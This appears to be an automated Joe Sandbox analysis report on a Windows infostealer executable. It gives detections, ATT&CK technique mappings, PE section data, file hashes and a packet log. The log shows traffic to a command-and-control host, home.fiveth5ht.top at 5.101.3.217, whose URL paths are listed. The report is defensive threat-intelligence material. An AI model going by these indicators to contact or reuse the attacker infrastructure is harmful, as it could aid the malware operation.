Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
w6cYYyWXqJ.exe33%VirustotalBrowse
w6cYYyWXqJ.exe100%AviraTR/Crypt.TPM.Gen
w6cYYyWXqJ.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQ0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=00%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF170%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868620%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0e60%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		3.218.7.103
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlw6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpfalse
          		high
          http://home.fiveth5ht.top/OyKvQw6cYYyWXqJ.exe, 00000003.00000002.1489724133.0000000007470000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://html4/loose.dtdw6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#w6cYYyWXqJ.exefalse
              		high
              https://httpbin.org/ipbeforew6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0e6w6cYYyWXqJ.exe, 00000003.00000002.1483886052.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452487923.0000000000B51000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://curl.se/docs/http-cookies.htmlw6cYYyWXqJ.exe, w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://curl.se/docs/hsts.html#w6cYYyWXqJ.exefalse
                    		high
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSw6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.se/docs/alt-svc.htmlw6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://.cssw6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://.jpgw6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lsew6cYYyWXqJ.exe, 00000003.00000003.1453682176.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453663304.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1483267800.0000000000B49000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          5.101.3.217
                          		home.fiveth5ht.topRussian Federation
                          		34665PINDC-ASRUfalse
                          3.218.7.103
                          		httpbin.orgUnited States
                          		14618AMAZON-AESUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1581212
                          Start date and time:2024-12-27 08:37:10 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:w6cYYyWXqJ.exe
                          renamed because original name is a hash value
                          Original Sample Name:26e7c91d9fb68ef0ce54aabc0465a8b0.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          5.101.3.217mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                          • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                          3.218.7.103E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            httpbin.orgmBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                            • 34.226.108.155
                            HFoyAy1tg8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • 98.85.100.80
                            8kl5nJ3f9x.exeGet hashmaliciousCryptbotBrowse
                            • 98.85.100.80
                            7kf4hLzMoS.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • 98.85.100.80
                            home.fiveth5ht.topmBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            PINDC-ASRUmBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217
                            6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                            • 91.215.85.11
                            Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                            • 91.215.85.142
                            3cb770h94r.elfGet hashmaliciousOkiruBrowse
                            • 45.145.172.130
                            na.elfGet hashmaliciousMiraiBrowse
                            • 5.188.210.194
                            na.elfGet hashmaliciousMirai, MoobotBrowse
                            • 5.8.21.138
                            lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                            • 80.87.206.189
                            lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                            • 80.87.206.189
                            https://trstwalsecu.com/Get hashmaliciousUnknownBrowse
                            • 91.215.85.16
                            AMAZON-AESUSdb0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 50.17.226.153
                            mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            xd.mips.elfGet hashmaliciousMiraiBrowse
                            • 34.206.168.77
                            xd.x86.elfGet hashmaliciousMiraiBrowse
                            • 44.213.56.197
                            telnet.arm.elfGet hashmaliciousUnknownBrowse
                            • 18.209.195.84

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.984724303692274
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:w6cYYyWXqJ.exe
                            File size:4'519'424 bytes
                            MD5:26e7c91d9fb68ef0ce54aabc0465a8b0
                            SHA1:a2b0aee031cbd7f67d4f86c45354a2715ca0c25c
                            SHA256:23569c1720e9dd2b72da3ea832f2a0029c29c8d6b5f3e50caefed0dcbaa605ac
                            SHA512:047adff7d51e812470213b18cb11b9f5ec22e4416f7d6ea9bdfdea39159ae752fcafd5dd94e143b69fbaa4196f2a81e4a7e82843acd9467bb3590eb1ae823edb
                            SSDEEP:98304:1AIJjZfEYfN71TmUuOXQiItb+6B+s9K+MDYpHMtl7kl:OIJj1EdUuOAFtbfUs9K+T1Mtl7kl
                            TLSH:B426336A9B2891B8CD59ED3F29BC181F61F70F937197085D8CE450C5FDAAE6090B9F02
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................E...@... ............................

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x103e000
                            Entrypoint Section:.taggant
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                            DLL Characteristics:DYNAMIC_BASE
                            Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Authenticode Signature

                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:

                                Entrypoint Preview

                                Instruction
                                jmp 00007FEEDCC15EBAh
                                paddq mm0, qword ptr [eax+eax+00h]
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [ecx], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edx+ecx], al
                                add byte ptr [eax], al
                                pop es
                                or al, byte ptr [eax]
                                add byte ptr [ecx], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pushad
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc3cda80x10bzvzmdre
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0xc3cd580x18bzvzmdre
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x6db0000x288a000fa1ec959be5f467e148932c5dc46349unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x6dc0000x1ac0x200e9c8584261bcb0b066ee4220e56c1ab1False0.580078125data4.554503423022307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x6de0000x39c0000x20011a131118bf79d03158cadb5d3c2376bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                bzvzmdre0xa7a0000x1c30000x1c300017955d93ac0435bc8b6bf91fcdc1c97eFalse0.9944616347353105data7.954619105553536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                syyxadwf0xc3d0000x10000x4001bf00288faf77bdbf648945d5853a509False0.80859375data6.228516142649406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0xc3e0000x30000x2200173480eae4705afc74c8065102569ad0False0.06904871323529412DOS executable (COM)0.8034534274867503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0xc3cdb80x152ASCII text, with CRLF line terminators0.6479289940828402

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 27, 2024 08:38:10.432202101 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:10.432223082 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:10.432282925 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:10.445777893 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:10.445796967 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:12.185637951 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:12.186707973 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:12.186732054 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:12.188167095 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:12.188232899 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:12.189883947 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:12.189965963 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:12.203062057 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:12.203083992 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:12.257929087 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:12.523448944 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:12.523792982 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:12.523873091 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:12.572650909 CET49700443192.168.2.73.218.7.103
                                Dec 27, 2024 08:38:12.572669983 CET443497003.218.7.103192.168.2.7
                                Dec 27, 2024 08:38:16.357299089 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.477395058 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.477488995 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.491507053 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.611140966 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611170053 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611265898 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.611294031 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611329079 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611382961 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.611479044 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611495018 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611506939 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611540079 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.611560106 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.611571074 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611596107 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611604929 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.611640930 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.730839014 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.731049061 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.731105089 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.731128931 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.731185913 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.731333017 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.731343031 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.731353045 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.731389046 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.731461048 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.772567034 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.773658037 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.892549038 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:16.893707037 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:16.936608076 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.060594082 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.060722113 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.264601946 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.264667988 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.511096001 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.511236906 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.532475948 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.532660007 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.532723904 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.630935907 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.631062984 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652296066 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652311087 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652331114 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652340889 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652400970 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652401924 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652427912 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652430058 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652447939 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652462006 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652510881 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652522087 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652559996 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652592897 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652626991 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652631044 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652679920 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652702093 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652712107 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652740002 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652755976 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652760983 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652790070 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.652861118 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.652905941 CET4970280192.168.2.75.101.3.217
